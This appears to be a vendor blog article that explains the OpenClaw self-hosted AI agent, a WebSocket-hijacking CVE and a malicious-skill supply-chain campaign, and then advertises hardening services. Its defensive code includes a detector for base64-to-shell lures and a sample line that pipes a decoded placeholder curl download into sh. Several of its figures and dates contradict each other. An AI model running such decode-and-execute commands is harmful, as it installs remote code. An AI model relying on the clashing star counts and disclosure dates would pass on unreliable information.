What Is OpenClaw? The Viral AI Agent Explained

OpenClaw hit 302,000+ GitHub stars in under 60 days -- the fastest organic growth in open-source history. Here's what it actually is, how it works, and why 135,000+ exposed instances became a security crisis.

By Silverthread Labs

Tags: OpenClaw AI agent explained, OpenClaw GitHub stars, OpenClaw security risks

In late January 2026, an open-source project called OpenClaw appeared on GitHub. Within 24 hours it had 20,000 stars. Within 60 days it had surpassed React, a project that took over a decade to reach its star count, to become the most-starred software repository on GitHub. By February, it was also the subject of a CVSS 8.8 security advisory, a coordinated supply-chain attack on its plugin marketplace, and coverage in every major security publication.

This article explains what OpenClaw actually is, why it grew the way it did, how it works under the hood, and what the security picture looks like for anyone considering running it.


what OpenClaw is

a self-hosted AI agent, not a chatbot

OpenClaw is not a chatbot. It is an AI agent, a system that doesn't just respond to prompts but takes actions in the real world on your behalf. The difference is not semantic. A chatbot answers questions. An agent executes tasks: reading your email and drafting replies, checking your calendar and booking a meeting, querying a database and returning a formatted report. OpenClaw does all of this autonomously, running on hardware you control, connected to the services and files you authorize.

The self-hosted architecture is the core design choice. Unlike cloud AI products, OpenClaw processes data locally. Your documents, messages, and credentials never leave your machine unless you configure a skill that explicitly routes data outbound.

local-first: your data stays on your hardware

OpenClaw runs on your own hardware, whether that is a home server, a desktop machine, or a VPS you control. The inference layer can run either locally (using a local model via Ollama, LM Studio, or similar) or routed through an API provider like OpenAI or Anthropic. The key difference from cloud-hosted AI: the orchestration layer, your files, and your credentials never leave your infrastructure.

how it connects to your tools via the Model Context Protocol

OpenClaw extends itself through the Model Context Protocol (MCP), an open standard developed by Anthropic for connecting AI models to external tools and data sources.

Each skill in its ClawHub marketplace is an MCP server: a lightweight program that exposes a set of callable tools. When you install a web-search skill, OpenClaw gains access to a search tool it can call mid-task. When you install a calendar skill, it can read and write events. When you install a file-manager skill, it can navigate and modify your local filesystem.

Because MCP is an open standard, teams can build custom MCP servers too, connecting OpenClaw to internal APIs, CRMs, ticketing systems, or any other tool not covered by the public marketplace.


why OpenClaw went viral

302,000+ GitHub stars: the fastest organic growth in open-source history

OpenClaw's star trajectory was genuinely unprecedented. The project picked up 9,000 stars on its first day. Three days later: 60,000. Two weeks in: 190,000. By March 3, 2026, it crossed 250,829 stars, surpassing React (243,000 stars), Linux (218,000 stars), and every other software repository on GitHub except TensorFlow.

By the time it stabilized, OpenClaw had exceeded 302,000 stars. No open-source project had reached that milestone in under 60 days before. The star history was confirmed by star-history.com, which tracked its ascent past React in real time.

The growth was organic: no paid promotion, no Product Hunt launch sequence, no coordinated campaign. It spread through developer social media, Hacker News, and YouTube.

what made it different from every AI product before it

OpenClaw gave non-developers something no prior AI product had: a personal AI agent running entirely on their own hardware, connected to their actual tools, executing real tasks without a subscription or a cloud dependency.

Cloud AI assistants respond to you. OpenClaw runs while you're not watching. It checks your inbox at 3am and flags the email that needs attention by morning. It connects to your calendar, your notes, your messaging apps, and your files, not through a third-party integration layer with opaque data practices, but directly, on hardware you own. For anyone who had concerns about data privacy with cloud AI, that felt different from the theoretical privacy promises most products offered.

the creator: Peter Steinberger and the path from PSPDFKit to a nonprofit foundation

OpenClaw was built by Peter Steinberger, an Austrian developer known online as @steipete and the founder of PSPDFKit (now Nutrient), a PDF rendering SDK used in thousands of apps. Steinberger had been working on the underlying concept since 2024, refining it through earlier iterations called Clawdbot and Moltbot before the OpenClaw name stuck.

The project's success moved faster than any single person could manage. By mid-February 2026, Steinberger had joined OpenAI and transferred governance of the project to an independent 501(c)(3) nonprofit foundation, a move intended to keep the project independent from any single company's commercial interests.


how OpenClaw actually works

the agent loop: perceive, reason, act

OpenClaw runs an agentic loop: it receives context (a task, a schedule trigger, an incoming message), reasons about what to do using an LLM backbone, and executes actions through its installed skills. After an action, it evaluates the result and decides whether the task is done or needs more steps. This is what separates it from a chatbot that responds once and waits. OpenClaw is designed to run multi-step workflows without human prompting between each step.

skills and ClawHub: OpenClaw's marketplace of MCP servers

ClawHub is OpenClaw's official skills marketplace, basically an app store for the agent. As of early 2026, ClawHub listed over 5,400 skills covering web search, calendar management, email, file operations, code execution, image generation, data analysis, CRM integrations, and more.

Every skill is an MCP server. Installing one means OpenClaw connects to that server and can call its tools during task execution. Skills can be toggled on or off without editing config files, which is part of why non-developers found the setup manageable.

what OpenClaw can do with the right skill set installed

With a modest skill configuration, a typical OpenClaw setup can:

  • Monitor and triage an inbox, draft replies to routine emails, and flag high-priority messages
  • Read a calendar, identify scheduling conflicts, and book or decline meetings
  • Search the web, compile research summaries, and save outputs to a notes app
  • Execute scripts and run code for repetitive data processing tasks
  • Trigger webhooks and API calls to external services
  • Connect to internal tools via custom MCP servers for business-specific workflows

The capability ceiling is determined by which MCP servers you connect and what permissions you grant them, not by the agent's core architecture.


the security crisis nobody expected

CVE-2026-25253: the CVSS 8.8 RCE that hit before most users had even installed it

CVE-2026-25253 was disclosed on February 1, 2026. It carries a CVSS score of 8.8.

The flaw is a cross-site WebSocket hijacking vulnerability in the OpenClaw gateway. If a user running OpenClaw visited an attacker-controlled web page, JavaScript on that page could silently open a WebSocket connection to the local OpenClaw gateway, steal the authentication token, and take full administrative control of the instance, without any interaction beyond page load. One click. The attacker gets the same access level as the user: files, code execution, credentials stored in the agent's memory, and any MCP tools the agent has access to.
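The general defense against this class of bug is to validate the `Origin` and `Host` headers during the WebSocket upgrade, because browsers attach the calling page's origin to the handshake but do not block cross-origin WebSocket connections themselves. The sketch below is an added example, not OpenClaw's gateway code or its patch; port 8080, the allowlists, and the function names are assumptions.

```javascript
// Added example (not OpenClaw's code): handshake checks a local WebSocket
// gateway can apply against cross-site WebSocket hijacking.
// ASSUMPTIONS: port 8080 and the allowlists below are placeholders.
const ALLOWED_ORIGINS = new Set(["http://127.0.0.1:8080", "http://localhost:8080"]);
const ALLOWED_HOSTS = new Set(["127.0.0.1:8080", "localhost:8080"]);

// "Before" form: accepts any upgrade, so any page open in the user's
// browser can connect to the gateway.
function naiveAcceptUpgrade(headers) {
  return (headers["upgrade"] || "").toLowerCase() === "websocket";
}

// Hardened form. `headers` is a Node-style map with lowercase keys.
function checkUpgrade(headers) {
  if (!naiveAcceptUpgrade(headers)) {
    return { ok: false, reason: "not a websocket upgrade" };
  }
  // Host allowlist: rejects DNS-rebinding names that resolve to 127.0.0.1.
  const host = (headers["host"] || "").toLowerCase();
  if (!ALLOWED_HOSTS.has(host)) return { ok: false, reason: "unexpected Host" };

  // Browsers always send Origin on a WebSocket handshake. This sketch
  // rejects its absence; non-browser clients would need their own auth path.
  const origin = headers["origin"];
  if (typeof origin !== "string") return { ok: false, reason: "missing Origin" };
  let parsed;
  try {
    parsed = new URL(origin);
  } catch {
    return { ok: false, reason: "malformed Origin" }; // includes "null"
  }
  // Exact match on the normalized origin; never prefix or substring tests.
  if (!ALLOWED_ORIGINS.has(parsed.origin)) {
    return { ok: false, reason: "cross-site Origin" };
  }
  return { ok: true, reason: "ok" };
}

// Constructed handshake headers, as sent from a page on another site.
const CROSS_SITE = {
  upgrade: "websocket",
  host: "127.0.0.1:8080",
  origin: "https://attacker.example",
};
console.log(naiveAcceptUpgrade(CROSS_SITE), checkUpgrade(CROSS_SITE));
```
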

A patch landed in version 2026.1.29 within 24 hours of initial disclosure. Installations running prior versions remain vulnerable. According to SecurityScorecard's STRIKE team, over 50,000 of the 135,000+ publicly exposed OpenClaw instances were still running unpatched versions as of the first week of February 2026.

135,000+ exposed instances: what the SecurityScorecard findings actually mean

SecurityScorecard identified 135,000+ internet-facing OpenClaw instances across 82 countries. The number tells you something about how the default configuration works.

OpenClaw's default gateway configuration does not restrict network access to localhost. An installation deployed on a home server, a VPS, or any machine connected to the internet can be reached externally if the gateway port is not explicitly firewalled. Most users who followed a basic setup tutorial without security hardening left their gateway open.

Of those 135,000+ instances, over 50,000 were directly vulnerable to the CVE-2026-25253 RCE. An additional 53,000+ were correlated with prior breach activity, suggesting many were already compromised or operating in high-risk environments. Most of the patching happened gradually over weeks, not in the first days after disclosure.

ClawHavoc: 1,184 malicious skills and the supply-chain attack you didn't see coming

While CVE-2026-25253 was being patched, a separate threat was operating inside ClawHub itself.

Repello AI's threat research team identified and formally named a coordinated supply-chain attack campaign: ClawHavoc. By March 1, 2026, researchers had found 1,184 confirmed malicious skills on ClawHub, roughly one in five packages in the marketplace at the time. That is a bad number. The ClawHavoc campaign accounted for over 300 coordinated skills, with 335 traced to a single threat actor.

The attack mechanism was social engineering combined with malware delivery. Malicious skills displayed fake error messages prompting users to run a diagnostic command: a base64-encoded payload that, when executed, downloaded Atomic Stealer (AMOS). AMOS exfiltrates browser credentials, saved passwords, session tokens, and cryptocurrency wallet data.
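A vetting pass can flag this lure before a skill is installed by scanning the text a skill ships (README, error strings) for instructions to decode a base64 blob and pipe it into a shell. This is an added example, not ClawHub's vetting code; the article does not quote the campaign's commands, so the decode-and-pipe shape matched here, the function names, and the sample text are assumptions.

```javascript
// Added example (not ClawHub's vetting code): flag skill-supplied text that
// tells the user to decode a base64 blob and pipe it into a shell.
// ASSUMPTION: the decode-and-pipe command shape; the article does not
// quote the campaign's actual commands.
const B64_TO_SHELL =
  /([A-Za-z0-9+\/]{16,}={0,2})["']?\s*\|\s*base64\s+(?:-d|-D|--decode)\b[^\n|]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b/;
const REMOTE_FETCH = /\b(?:curl|wget)\b/;

// Returns one finding per matching line. The blob is decoded for triage
// only; nothing is executed.
function scanSkillText(text) {
  const findings = [];
  text.split("\n").forEach((line, i) => {
    const m = B64_TO_SHELL.exec(line);
    if (!m) return;
    const decoded = Buffer.from(m[1], "base64").toString("utf8");
    findings.push({
      line: i + 1,
      decoded,
      fetchesRemote: REMOTE_FETCH.test(decoded),
    });
  });
  return findings;
}

// Constructed sample: a fake "error" in the style the article describes.
// The blob decodes to a harmless placeholder, built here so it is auditable.
const BLOB = Buffer.from("curl https://example.invalid/placeholder").toString("base64");
const SAMPLE_SKILL_TEXT = [
  "Calendar sync skill v1.2",
  "ERROR 0x51: dependency check failed. To repair, run this diagnostic:",
  `echo "${BLOB}" | base64 -d | sh`,
  "Usage: ask the agent to list today's events.",
].join("\n");
console.log(scanSkillText(SAMPLE_SKILL_TEXT));
```
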

The supply-chain attack was not a flaw in OpenClaw's code. It was a flaw in trust: the assumption that a skill listed on a popular marketplace is safe to install. OpenClaw's team has since implemented a vetting process, but the ClawHavoc campaign showed how quickly an unmonitored marketplace can be exploited during viral growth.


should you run OpenClaw?

the honest risk picture for home users

OpenClaw is a capable project from a developer with a real engineering track record. The security incidents were real, but most of the severe exposure came from three specific factors: running an unpatched version (pre-2026.1.29), leaving the gateway port open to the internet, and installing skills from ClawHub without vetting them.

A home user who runs OpenClaw on a local-only network interface, patches promptly, and limits skill installation to well-reviewed packages is in a materially different situation than the 135,000+ public instances SecurityScorecard catalogued.

what a safely configured install requires

A minimum-viable secure OpenClaw configuration includes:

  • Running version 2026.1.29 or later (CVE-2026-25253 patched)
  • Binding the gateway to localhost only (127.0.0.1), not 0.0.0.0
  • Enabling authentication on the gateway, which is not on by default in all version branches
  • Installing only skills from publishers with verifiable identities and published source code
  • Avoiding any skill that requests system-level permissions unless you understand exactly what it does
  • Setting up a firewall rule blocking external access to the gateway port if the machine has any internet exposure
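Two items on this checklist, the patched version and the loopback-only bind, can be checked mechanically from the installed version string and the output of `ss -ltnH` on Linux. This is an added example, not OpenClaw tooling; the gateway port 8080 is a placeholder assumption, and the sample `ss` output is constructed.

```javascript
// Added example (not OpenClaw tooling): audit two checklist items from
// text you collect yourself. ASSUMPTION: 8080 is a placeholder gateway port.
const PATCHED = "2026.1.29"; // first fixed version, per the article

// Component-wise numeric compare: "2026.1.9" is older than "2026.1.29",
// which a plain string comparison gets wrong.
function isPatched(version) {
  const a = String(version).trim().split(".").map(Number);
  const b = PATCHED.split(".").map(Number);
  if (a.some(Number.isNaN)) return false; // unknown format: treat as unpatched
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const d = (a[i] || 0) - (b[i] || 0);
    if (d !== 0) return d > 0;
  }
  return true;
}

function isLoopback(addr) {
  const host = addr.replace(/%.*$/, "").replace(/^\[|\]$/g, "");
  return host === "::1" || /^127\.\d+\.\d+\.\d+$/.test(host);
}

// Parse `ss -ltnH` output (Linux) and return the local addresses on `port`
// that are not loopback, i.e. reachable unless a firewall blocks them.
function exposedListeners(ssOutput, port) {
  const exposed = [];
  for (const line of ssOutput.split("\n")) {
    const cols = line.trim().split(/\s+/);
    if (cols.length < 5 || cols[0] !== "LISTEN") continue;
    const local = cols[3]; // "addr:port"; IPv6 addresses are bracketed
    const idx = local.lastIndexOf(":");
    if (Number(local.slice(idx + 1)) !== port) continue;
    const addr = local.slice(0, idx);
    if (!isLoopback(addr)) exposed.push(addr);
  }
  return exposed;
}

// Constructed sample of `ss -ltnH` output.
const SAMPLE_SS = [
  "LISTEN 0 128  0.0.0.0:22        0.0.0.0:*",
  "LISTEN 0 511  0.0.0.0:8080      0.0.0.0:*",
  "LISTEN 0 511  [::]:8080         [::]:*",
  "LISTEN 0 4096 127.0.0.53%lo:53  0.0.0.0:*",
].join("\n");
console.log(isPatched("2026.1.9"), exposedListeners(SAMPLE_SS, 8080));
```
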

For users who want MCP integrations connecting OpenClaw to external business tools (CRMs, ticketing systems, internal APIs), the configuration surface grows significantly and the hardening requirements scale with it.

when professional deployment makes sense

For most technically confident home users, a careful DIY install on a local network is reasonable if they follow the hardening checklist above.

Professional deployment makes sense when the install is going on a machine with any internet exposure: a home server with a public IP, a VPS, or an office network where other people are present. It also makes sense when OpenClaw is being deployed for a business, where you have multiple users, company tool integrations, compliance requirements, or data sensitivity beyond personal use. And if you are not confident in network configuration and don't want to learn it, the risk of getting it wrong on an exposed machine is not abstract.

Silverthread Labs offers OpenClaw setup and hardening services starting at $399 for personal installs. Business deployments, multi-user, with RBAC, audit logging, and custom MCP integrations, start at $2,500. Both tiers include CVE-2026-25253 patching, gateway lockdown, and plugin vetting against ClawHavoc supply-chain attack patterns.

Get your OpenClaw deployment handled by our team or read the detailed security hardening guide if you're doing it yourself.


FAQ

What is OpenClaw in simple terms?

OpenClaw is a self-hosted AI agent that runs on your own hardware. Unlike cloud AI assistants that respond to prompts, OpenClaw executes tasks autonomously: reading your email, checking your calendar, triggering automations. It uses an LLM backbone and a plugin system called skills.

Is OpenClaw free?

The software is free and open source, maintained by an independent nonprofit foundation. You pay for whatever LLM API you connect it to (OpenAI, Anthropic, etc.) or you can run inference locally at no cost using open-weight models.

Is OpenClaw safe to install in 2026?

Running version 2026.1.29 or later on a local network with authentication enabled is materially safer than the default configuration most tutorials describe. The critical CVE-2026-25253 vulnerability is patched in that version. The remaining risk is skill selection: only install skills from publishers with verifiable, reviewed code.

What is ClawHub?

ClawHub is OpenClaw's official skills marketplace, with over 5,400 MCP server packages that extend what the agent can do. Each skill is an MCP server the agent can call during task execution.

What is ClawHavoc?

ClawHavoc is a coordinated supply-chain attack campaign that planted malicious skills in ClawHub. Security researchers identified 1,184 total malicious skills in the marketplace as of March 2026, with 335+ traced to a single threat actor. The malicious skills used social engineering to deliver Atomic Stealer (AMOS) malware.

What is CVE-2026-25253?

CVE-2026-25253 is a CVSS 8.8 vulnerability in OpenClaw that enables one-click remote code execution via cross-site WebSocket hijacking. An attacker-controlled web page can steal the OpenClaw gateway authentication token and take full control of the instance. It was patched in version 2026.1.29, released January 29, 2026.

Can I use OpenClaw for my business?

Yes, but a business deployment requires additional configuration: role-based access control, audit logging, proper network segmentation, and custom MCP servers to connect it to your existing tools. A default install is not production-ready for multi-user or compliance-sensitive environments.

Last updated: March 16, 2026
